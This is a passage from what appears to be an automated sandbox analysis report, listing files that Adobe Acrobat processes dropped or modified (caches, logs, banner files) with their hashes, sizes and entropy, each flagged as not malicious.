SHA1: | 615F1680F488EC76C923EFF7A689C495E9BA6C51 |
SHA-256: | 338FEBB11B00D003B4183DDD45A91EC4325412522FBD220DA6CFD6F3C776E434 |
SHA-512: | 6A2D8B03B78283F30E0F0103375352C85E33A46F23443B595E31029873C331F93E37FC30C25D01EBE710FAD048001C9710F8888C971921A04477E17D086B74B4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.224771850613062 |
Encrypted: | false |
SSDEEP: | 6:iO4qXaQFIL4q2PqLTwi2nKuAl9OmbnIFUtSqXaSF+JZmwsqXaSF+DkwOqLTwi2nC:70Q+4v8wZHAahFUt+SQJ/YSQD5TwZHAR |
MD5: | F696AA42D067211C4FE764A3D36CD236 |
SHA1: | BE4E5130648D6DC6D82004FAAD52BBB6B912B2AB |
SHA-256: | 7C1E18823F353CE936C67249409AF17262C70652F98EC5CF906566A87C5788DA |
SHA-512: | CE0D23AA25E936958DC4A35DD625BA7DBFBEB57D38D86C0316C5F3CCDC73037C5413D13C8D641E4EED146BEA73DA7928AD464E1091C149B42374DE4B13357E12 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.224771850613062 |
Encrypted: | false |
SSDEEP: | 6:iO4qXaQFIL4q2PqLTwi2nKuAl9OmbnIFUtSqXaSF+JZmwsqXaSF+DkwOqLTwi2nC:70Q+4v8wZHAahFUt+SQJ/YSQD5TwZHAR |
MD5: | F696AA42D067211C4FE764A3D36CD236 |
SHA1: | BE4E5130648D6DC6D82004FAAD52BBB6B912B2AB |
SHA-256: | 7C1E18823F353CE936C67249409AF17262C70652F98EC5CF906566A87C5788DA |
SHA-512: | CE0D23AA25E936958DC4A35DD625BA7DBFBEB57D38D86C0316C5F3CCDC73037C5413D13C8D641E4EED146BEA73DA7928AD464E1091C149B42374DE4B13357E12 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.2284488909236035 |
Encrypted: | false |
SSDEEP: | 6:iO4qXaQt+q2PqLTwi2nKuAl9Ombzo2jMGIFUtSqXFZmwsqX/6VkwOqLTwi2nKuAv:7kZv8wZHAa8uFUt5/5y5TwZHAa8RJ |
MD5: | 0C004895FE17C5C46D52C08F0FF84273 |
SHA1: | 213C663B60983ECDCC1412065BB82D787535CFDD |
SHA-256: | 91D9486FF1D07D5A852A49E4AC95FB57A11CB69DF1493AA2BF077C440ECFA6D4 |
SHA-512: | C7FF64EE38476E1A8EB5E624105EFB3BFEB7E2C5DF0A841EA27C2CA99A580BA5111AAD6F44616940E109BA1088E102B2CCAFE2A078C5F69EB7DB0557FFB48F64 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.2284488909236035 |
Encrypted: | false |
SSDEEP: | 6:iO4qXaQt+q2PqLTwi2nKuAl9Ombzo2jMGIFUtSqXFZmwsqX/6VkwOqLTwi2nKuAv:7kZv8wZHAa8uFUt5/5y5TwZHAa8RJ |
MD5: | 0C004895FE17C5C46D52C08F0FF84273 |
SHA1: | 213C663B60983ECDCC1412065BB82D787535CFDD |
SHA-256: | 91D9486FF1D07D5A852A49E4AC95FB57A11CB69DF1493AA2BF077C440ECFA6D4 |
SHA-512: | C7FF64EE38476E1A8EB5E624105EFB3BFEB7E2C5DF0A841EA27C2CA99A580BA5111AAD6F44616940E109BA1088E102B2CCAFE2A078C5F69EB7DB0557FFB48F64 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\916ad02a-3ab8-48ec-8b42-2fc3c50e85ff.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.96165270016851 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7 |
MD5: | ACCB522AE87A739BDC04EB5A34975EEB |
SHA1: | A41FED54445E729A85E7017A002D4FF6FCAFEC93 |
SHA-256: | C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96 |
SHA-512: | 5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.96165270016851 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7 |
MD5: | ACCB522AE87A739BDC04EB5A34975EEB |
SHA1: | A41FED54445E729A85E7017A002D4FF6FCAFEC93 |
SHA-256: | C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96 |
SHA-512: | 5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF417a73.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.96165270016851 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7 |
MD5: | ACCB522AE87A739BDC04EB5A34975EEB |
SHA1: | A41FED54445E729A85E7017A002D4FF6FCAFEC93 |
SHA-256: | C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96 |
SHA-512: | 5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f5c6067a-c305-4dba-be87-26113740599b.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.964435627287755 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqURsBdOg2HIScaq3QYiub5P7E4TX:Y2sRdsWdMHI93QYhbt7n7 |
MD5: | 68CB10443EC1125BBA1DAEB9AC98FC67 |
SHA1: | 60A0F2E3E547E47F8F4654584FF3441ED1200C9D |
SHA-256: | 8D51521ACDB5CA31074F08F05DDEEBC9B2250E8B6814CCAF4898EF77264475C9 |
SHA-512: | 79B303FB687F0EA7BE4B0314DBE3BFE6D64F9E7169921A0B03380E2DA52921F3ACB5C6698E2AB1B0140A5600E06B4845D9B5CE4399F8A2D59E648DFD5B8D9F31 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.219843672049814 |
Encrypted: | false |
SSDEEP: | 96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068Oz6V/37k2+:1CDLCmPj8j0/8qKgwPHYPx8xemT8Oz6U |
MD5: | 2D072DDA0861FC81CD152C87D0FEC99C |
SHA1: | 69CEE57750D898106DCD36A7C06B9B21E140F134 |
SHA-256: | 9499808B2391A20023C43FD84CE944B63950ABDD9856A0049836D63562B6E0CE |
SHA-512: | E43AC08550985A044FED44517D1FA04492A6E090372325E59CF16D885E63B95A7C0A2EF7EAE48FCCA8596C290C618857594EE40197234F00F0780EEE353AEDF7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.178397071312552 |
Encrypted: | false |
SSDEEP: | 6:iO4qXut+q2PqLTwi2nKuAl9OmbzNMxIFUtSqX/ZmwsqXp6VkwOqLTwi2nKuAl9Ob:7oov8wZHAa8jFUtj/G5TwZHAa84J |
MD5: | 6D00AA7734D2E62A7412A8A6134CC565 |
SHA1: | 11E48AA425C6E694F873C716D70ADDCC619CCA27 |
SHA-256: | 7E87B9C7DAA9CF384B5B80A9793255BCA44344D4BBB326126A464D5C2AB12CA5 |
SHA-512: | 292C25D7EA8F50F71F58767968816DB51231C87D64003F3287A2990D1EEA73545FE3A030DA1B5A76B3EE868E1790160E47BCB8D7356E9EC5C3E29D3A93319682 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.178397071312552 |
Encrypted: | false |
SSDEEP: | 6:iO4qXut+q2PqLTwi2nKuAl9OmbzNMxIFUtSqX/ZmwsqXp6VkwOqLTwi2nKuAl9Ob:7oov8wZHAa8jFUtj/G5TwZHAa84J |
MD5: | 6D00AA7734D2E62A7412A8A6134CC565 |
SHA1: | 11E48AA425C6E694F873C716D70ADDCC619CCA27 |
SHA-256: | 7E87B9C7DAA9CF384B5B80A9793255BCA44344D4BBB326126A464D5C2AB12CA5 |
SHA-512: | 292C25D7EA8F50F71F58767968816DB51231C87D64003F3287A2990D1EEA73545FE3A030DA1B5A76B3EE868E1790160E47BCB8D7356E9EC5C3E29D3A93319682 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438409356701376 |
Encrypted: | false |
SSDEEP: | 384:Sedci5GdiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:axurVgazUpUTTGt |
MD5: | C990E6253039D65C67A5115465CEBF67 |
SHA1: | CE5D9FE6448CCF4BE0661377E4F4C7720872D442 |
SHA-256: | FD7EA7018C2EEF7CF2E1AB19E121164D4F931AA09603E536C1B4C1AF29E28414 |
SHA-512: | 8FA18C76C290C9ECEDEE32700628F64CF4BE5355C8EBE963A317B8FC49AAADDF8793BFC510E88871CEA524C144B7ECA288942ADA6B4DD690939A037592E03866 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2136516438408536 |
Encrypted: | false |
SSDEEP: | 24:7+tp3D6wKdopqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmfR:7MdWGqPmFTIF3XmHjBoGGR+jMz+LhZ |
MD5: | 8D7D6065713A19E3D98223F194EDD510 |
SHA1: | 6D6E756BF9660F1E8A1430086CA6840D26C803C9 |
SHA-256: | 1829CE47C212513A96128C2BE0FC8BC5BCA956CBA82B50A1F4B98D8BC10A6B42 |
SHA-512: | 69CA7B770BE8171BE86FFD25131DB3558C21934178B35F68A792BB78A79C22C7A91E75BDFCA4581D82E68C9F98C849BC8EEE3C5FF0C8C6E2E5CC9F98C4F0C741 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.717788161692104 |
Encrypted: | false |
SSDEEP: | 3:kkFklF8AltfllXlE/HT8k37/XNNX8RolJuRdxLlGB9lQRYwpDdt:kKNceT8E7VNMa8RdWBwRd |
MD5: | 047FE42D528A698945B0553110AF72FE |
SHA1: | C2A2A5E0004BD531E223310E34E0014AA3E476F6 |
SHA-256: | F362A1B2CEDB2624BE07BCAC8B1AD9835D9EFD9BF1E14F36C437AB29F58A22C4 |
SHA-512: | F8C58F5480DFCFD4AA199C2D227A809C5D9F82EBE6540E38674561AFF3A531DDCE46705ACBDF25A522BD8CBB5D610ACB2D39CB74E8ACB3BB5373BFFC0EBBB49F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.2429904267830576 |
Encrypted: | false |
SSDEEP: | 6:kKOL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:miDImsLNkPlE99SNxAhUe/3 |
MD5: | 162B2DA4B2199C0EEDC414051AE89DA5 |
SHA1: | 971CFE2E640C5CE994E8A243BC918D8D2D69B168 |
SHA-256: | 162AD6D07DA9034BB3CEE4599AEAF9D78D7DEE6667B65BFC67986E25E25618F1 |
SHA-512: | 234CDAFB33387EE2851A44E49FD7FE7A18237FDDAB977F4044CD51900FA798868A141B37AB18243AAE28F6F8936C0BE8851A7565CB04AB8EA5F570AE6B8CF94C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.329747988187255 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJM3g98kUwPeUkwRe9:YvXKXF3hwBrT5LjIPxGMbLUkee9 |
MD5: | 4829E5DEC59949A65F2ADC2C10340345 |
SHA1: | 7EA87B469D38D08AAB50BB5B1595AD1F08F23136 |
SHA-256: | 0D612355E883B37F6C98AB0C2C5B64A7278EC84077C015204D039652840CC5D5 |
SHA-512: | 245C49326A6C07ADF3951175EF711A236677E1526BD0AB65A148BCF92B1F63967C98880536B5207FFD4A513D27A18624C16C8A0EC8E328F2C0BC81B4F45D2256 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.281352424195675 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJfBoTfXpnrPeUkwRe9:YvXKXF3hwBrT5LjIPxGWTfXcUkee9 |
MD5: | 120E8D9E454A2FED78EFAB9CA0C0F50A |
SHA1: | 5D4AC29F205C6588B4B7176EE7F86F1D1457835E |
SHA-256: | 0C3D2AB41867D9244086FE3CF9A7064A36F79F8D8AA171803942312C7305BB2D |
SHA-512: | A1481700A4D3CAE93F29BD67113A86027079631A88632BA5B503BC23409E453E267DADA4F13EE463CAC27CA932CC41D65369AFF288229D83E2380C54A123E443 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.259113494567501 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJfBD2G6UpnrPeUkwRe9:YvXKXF3hwBrT5LjIPxGR22cUkee9 |
MD5: | 8D6310C1BF18D261287205D60FB04189 |
SHA1: | 7EF4DB3F5469B5D1D68A50D199F9A564DAA89A36 |
SHA-256: | 21BA8E51E308160C54001786CBCCAE3D6148EA6F4C8D80CCE26069C7100F6216 |
SHA-512: | 1D702A3C7C5EF7F8F0B536302A94AC15506FCA5C1BF33D513412DA38C7F4A6E3E662673674AF789E0C84A4BC1A9222C6F1CD14E2D80C087CEC9BCB90EA2E7808 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.309570533092315 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJfPmwrPeUkwRe9:YvXKXF3hwBrT5LjIPxGH56Ukee9 |
MD5: | 9B4B66F801E1643E031216CBB04E4F98 |
SHA1: | 99E87E38EC7B209ECF5611CF16146AE740D34199 |
SHA-256: | 2C3BC7C6D7E4F99D1EE42FA51C0BD495875024C598D28E42675FA04B7AE3F0FA |
SHA-512: | 33051BA4EB4E30A6463BDE50F0AEE5CB08C673810863B8A124C933B8EA4A9AE8994D7BCE1ED4DDF5BE15C7FB2F07DA3066CA2C773CF08086C1B5B0C0FE3CD1EF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.688851840118006 |
Encrypted: | false |
SSDEEP: | 24:Yv6XJhurT5XIupLgE9cQx8LennAvzBvkn0RCmK8czOCCSR:YvcsXDhgy6SAFv5Ah8cv/R |
MD5: | 1CAD54A39FA99AA050FB693D30A432BD |
SHA1: | 26338BDFE63ED226DC80486556BBE18ABB18F89E |
SHA-256: | 96930EF03C548FAA43B9CFAEE6C26C4E9F3BB866254CCCD0426C9586EEF31AC3 |
SHA-512: | C5A408E701345F643AD256DFD5871024E2494A1B0D65B9246F03A8824F47A92D982D850AB6A7126070A6EDB4F506FDBDE02118BD78FE7A806EE499E8142CA152 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.283024527501241 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJf8dPeUkwRe9:YvXKXF3hwBrT5LjIPxGU8Ukee9 |
MD5: | ECA448B54E9304C717F8F88F228022AE |
SHA1: | A2E65F8D2E4ABF8257C3700748E783E3DAFB1AEE |
SHA-256: | 5EC697E2673F82065AA800A43E6FED47472CC4FFDC6E9ECB75A28BBD779ED278 |
SHA-512: | E43A8E4447E9DB8B925026C04F5938DE0F48B113F688BE0628068CC0D8C53B675ACE1CD7FC4263ECDC6F31068B20B02CDCFFC27563C39FF5C1FD001441494C13 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.274737786218248 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJfQ1rPeUkwRe9:YvXKXF3hwBrT5LjIPxGY16Ukee9 |
MD5: | C9976AF8561FA6B89DA700C28BF58420 |
SHA1: | E3CEBD13551A0873C268ADE6FDBFF1A899741C57 |
SHA-256: | 16BAC30A5DF44FB91D10A99AC41F1157DCC08A82D42AF8C71B1809773B12F4DD |
SHA-512: | 3F921D9B84628C2472F67F010873F316FF8017926BFAF64F551CAA84E0CA302E9E65F2F31842DA4342E9B1F341DDB3DED21DDA1F749D9CFA75F29EA91DBA4783 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.29439441423965 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJfFldPeUkwRe9:YvXKXF3hwBrT5LjIPxGz8Ukee9 |
MD5: | BD606B6383E01AAE77093C48F219AD3A |
SHA1: | A1DE70195676B7E3E828FA052B8218D5C9C886F0 |
SHA-256: | E599064CE47B9C80975D4424E5C038AEDDCC6BD0D5AC9388A354C246B4AF1DE3 |
SHA-512: | 1625FB68E1B9AE0633A603D85BEC7A84FD8F5EB45109626441F6001F4AAA2472DE460517455815ED85007D5281DCBEE89955F487E07C68136485FB2139D3F0B8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.310355065161867 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFiehwdn4mSg1c2LjcWkHvR0YwiUoAvJfzdPeUkwRe9:YvXKXF3hwBrT5LjIPxGb8Ukee9 |
MD5: | 08F1BAEA4963201A7A9CEBFF0B1F9FCA |
SHA1: | E854C9F5F5AA72F4CCA8BFB01BC3EEF000A7E20F |
SHA-256: | 7F2EA42EFF0283C13C2EA8291F2776C851AFE772D1CD3FE341D600C7CB4DE675 |
